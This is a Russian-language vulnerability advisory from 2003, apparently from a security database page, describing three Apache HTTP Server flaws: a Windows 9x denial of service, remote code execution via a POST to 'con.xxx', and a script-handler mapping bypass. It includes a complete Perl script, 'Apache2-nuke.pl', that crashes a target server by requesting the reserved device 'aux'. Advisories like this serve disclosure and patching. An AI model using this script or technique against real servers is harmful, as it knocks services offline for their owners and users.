Несколько уязвимостей в Apache Web сервере

Дата публикации:
24.01.2003
Всего просмотров:
1605
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Apache HTTP Server содержит несколько уязвимостей, связанных с выполнением подпрограмм, которые позволяют атакующему заставить Apache сервер неправильно обрабатывать файлы, что может привести к зависанию всей системы или удаленному выполнию произвольного кода.

1. Удаленный DoS (VU#979793)

Уязвимость связанна с ошибочными регистрациями в функции ap_directory_walk и воздействует на Windows 9x системы, на которых выполняется Apache Web сервер.

Отказ в обслуживании может быть вызван при запросе зарезервированного DOS устройства, типа "aux":

 
--- Apache2-nuke.pl ---
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1 || @ARGV > 2) {
        print STDOUT "Usage: perl $0 <host> <port=80>";
        exit;
}
if (@ARGV == 2) {
        $port = $ARGV[1];
} else {
        $port = 80;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0], 
PeerPort=>$port);
print $f "GET /aux HTTP/1.0\r\n\r\n";
--- Apache2-nuke.pl ---
2. Удаленный root (VU#825177)

Эксплуатация этой уязвимости позволяет удаленному атакующему получить root привилегии на уязвимой системе. Уязвимость затрагивает Windows 9x версии Apache сервера, и имеет ту же самую причину, что и предыдущая уязвимость.

Когда данные передаются CGI сценарию (POST), stdin поток указывает на входные данные формы. Посылая POST к "con.xxx" в каталоге ScriptAlias, ваши POST данные будут выполнены CGI интерпретатором.

3. Обход заданного по умолчанию режима отображения сценариев(VU#384033).

Эксплуатация этой уязвимости позволяет обойти заданный по умолчанию режим отображения сценариев. Уязвимость воздействует на Apache для всех платформ. Эта проблема лучше всего описывается примером:

http://localhost/folder.php/file

Apache должен анализировать 'file' как открытый текст - то есть просто возвратить его назад браузеру. Однако, неправильная проверка в алгоритме отображения Apache, свяжет 'php' расширение с этим запросом. Вместо того, чтобы проверить только расширение файла, Apache проверяет расширения в любом члене пути, останавливаясь на первом.

Уязвимость обнаружена в Apache 1.3.х ( до 1.3.27) и Apache 2.0.х (до 2.0.43)

Ссылки: Path Parsing Errata in Apache HTTP Server

или введите имя

CAPTCHA